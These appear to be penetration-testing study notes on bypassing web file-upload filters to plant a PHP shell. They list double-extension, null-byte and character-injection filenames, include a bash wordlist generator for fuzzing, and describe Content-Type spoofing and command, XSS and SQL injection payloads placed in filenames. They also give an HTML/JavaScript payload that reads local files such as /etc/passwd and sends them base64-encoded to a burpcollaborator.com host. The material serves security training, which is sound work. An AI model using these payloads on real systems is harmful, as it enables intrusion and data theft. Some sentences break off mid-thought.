function checkFile(File) {
...SNIP...
if (extension !== 'jpg' && extension !== 'jpeg' && extension !== 'png') {
$('#error_message').text("Only images are allowed!");
File.form.reset();
$("#submit").attr("disabled", true);
...SNIP...
}
}
Tip: You may also do the same to remove accept=".jpg,.jpeg,.png", which should make selecting the PHP shell easier in the file selection dialog, though this is not mandatory, as mentioned earlier.
Blacklist Filters
Blacklisting Extensions
$fileName = basename($_FILES["uploadFile"]["name"]);
$extension = pathinfo($fileName, PATHINFO_EXTENSION);
$blacklist = array('php', 'php7', 'phps');
if (in_array($extension, $blacklist)) {
echo "File type not allowed";
die();
}
Tip: The comparison above is also case-sensitive, and is only considering lowercase extensions. In Windows Servers, file names are case insensitive, so we may try uploading a php with a mixed-case (e.g. pHp), which may bypass the blacklist as well, and should still execute as a PHP script.
Upload a file, once this request is captured, send it to the Intruder. Click on "Payloads" and select the "Sniper" attack type.
Click the "Positions" tab now, find the filename and "Add §" to the extension. It should look like so:
Use /usr/share/wordlists/dirb/extensions_common.txt
Uncheck url-encoding
Run the attack
Search for Non-Blacklisted Extensions - Look Content Length
Not all extensions will work with all web server configurations, so we may need to try several extensions to get one that successfully executes PHP code.
Other files that should be restricted for most applications:
.bat
.cgi .exe
.htm -> potential XSS
.html -> potential XSS
.jar
.rar
.shtml
.svg -> potential XSS
.swf -> potential XSS
.tar
.zip
.cer -> potential XSS
.hxt -> potential XSS
.stm -> potential XSS
Whitelist Filters
$fileName = basename($_FILES["uploadFile"]["name"]);
if (!preg_match('^.*\.(jpg|jpeg|png|gif)', $fileName)) {
echo "Only images are allowed";
die();
}
Double Extensions
Rename it
.php.png
.png.php
.PhP
.php%0A.png
.php%0D.png
.php.
.php.\png
.php./png
.php%20.png
.php?.png
.php#.png
shell (no file extension)
shell. (no file extension)
(no file name)
shell.php.jpg
shell.png.php
shell.jpeg.php5
shell.jpg.php
shell.phar.jpeg
exploit%2Ephp
exploit.asp;.jpg or exploit.asp%00.jpg
if (!preg_match('/^.*\.(jpg|jpeg|png|gif)$/', $fileName)) { ...SNIP... }
Only consider the final file extension, as it uses (^.*\.) to match everything up to the last (.), and then uses ($) at the end to only match extensions that end the file name
shell.php.jpg should pass the earlier whitelist test as it ends with (.jpg), and it would be able to execute PHP code due to the above misconfiguration, as it contains (.php) in its name.
Bypass
2️⃣ Upload the file and intercept the request.
4️⃣ Change the Content-Type to `application/x-httpd-php`.
5️⃣ Upload succeeds, and the file gets executed as PHP!
Capitalize the file extension
file.pHP5
Obfuscationg file extension
exploit.p.phphp
Character Injection
We can inject several characters before or after the final extension to cause the web application to misinterpret the filename and execute the uploaded file as a PHP script.
The following are some of the characters we may try injecting:
%20
%0a
%00
%0d0a
/
.\
.
…
:
Null Byte
shell.php%00.jpg works with PHP servers with version 5.X or earlier
blank.php%00.png
blank.php%2500.png
Windows server: injecting a colon (:) before the allowed file extension (e.g. shell.aspx:.jpg), which should also write the file as (shell.aspx)
exploit.asp;.jpg or exploit.asp%00.jpg
for char in '%20' '%0a' '%00' '%0d0a' '/' '.\\' '.' '…' ':'; do
for ext in '.php' '.phps'; do
echo "shell$char$ext.jpg" >> wordlist.txt
echo "shell$ext$char.jpg" >> wordlist.txt
echo "shell.jpg$char$ext" >> wordlist.txt
echo "shell.jpg$ext$char" >> wordlist.txt
done
done
Then, fuzz extensions
# vim char_injection.sh
# chmod +x char_injection.sh
# ./char_injection.sh
#!/bin/bash
# List of characters
chars=('%20' '%0a' '%00' '%0d0a' '/' '.\\' '.' '…' ':')
# List of extensions
extensions=('.php' '.phps' '.phar' '.php8')
# Create or clear the wordlist file
> wordlist.txt
# Loop through each character
for char in "${chars[@]}"; do
# Loop through each extension
for ext in "${extensions[@]}"; do
echo "shell$char$ext.jpg" >> wordlist.txt
echo "shell$ext$char.jpg" >> wordlist.txt
echo "shell.jpg$char$ext" >> wordlist.txt
echo "shell.jpg$ext$char" >> wordlist.txt
done
done
Intercept our upload request and change the Content-Type header to it:
Content-Type: image/jpg
Also try with:
Content-Type: image/png
Note: A file upload HTTP request has two Content-Type headers, one for the attached file (at the bottom), and one for the full request (at the top). We usually need to modify the file's Content-Type header, but in some cases the request will only contain the main Content-Type header (e.g. if the uploaded content was sent as POST data), in which case we will need to modify the main Content-Type header.
MIME-Type
Start with GIF
$ echo "this is a text file" > text.jpg
$ file text.jpg
text.jpg: ASCII text
XML data is not unique to SVG images, as it is also utilized by many types of documents, like PDF, Word Documents, PowerPoint Documents, among many others.
XXE vulnerability to enumerate the internally available services or even call private APIs to perform private actions
<html>
<body>
<b>Exfiltration via Blind SSRF</b>
<iframe src="file:///etc/passwd"></iframe>
<script>
var readfile = new XMLHttpRequest(); // Read the local file
var exfil = new XMLHttpRequest(); // Send the file to our server
readfile.open("GET","file:///var/www/html/dev-text.php", true);
readfile.send();
readfile.onload = function() {
if (readfile.readyState === 4) {
var url = 'http://burpcollaborator.com?data='+btoa(this.response);
exfil.open("GET", url, true);
exfil.send();
}
}
readfile.onerror = function(){document.write('<a>Oops!</a>');}
</script>
</body>
</html>
SSRF
PDFs, SVGs, or even Office documents. If the backend processes these files, SSRF might be hiding here
PDF Generators
DoS
Decompression Bomb
Pixel Flood
Other Upload Attacks
In images
SVG File
Hosts that process SVG can potentially be vulnerable to SSRF, LFI, XSS, RCE because of the rich feature set of SVG
Name a file file$(whoami).jpg or file`whoami`.jpg or file.jpg||whoami
XSS payload in the file name (e.g. <script>alert(window.origin);</script>), which would get executed on the target's machine if the file name is displayed to them. We may also inject an SQL query in the file name (e.g. file';select+sleep(5);--.jpg), which may lead to an SQL injection if the file name is insecurely used in an SQL query.
Save. Verification: file shell.php : shell.php: JPEG image data
Magic numbers list:
Uploading files using PUT
If appropriate defenses aren't in place, this can provide an alternative means of uploading malicious files, even when an upload function isn't available via the web interface.
Fuzz the upload form with to find what extensions are whitelisted by the upload form
The web application may still utilize a blacklist to deny requests containing PHP extensions. Try to fuzz the upload form with the to find what extensions are blacklisted by the upload form.
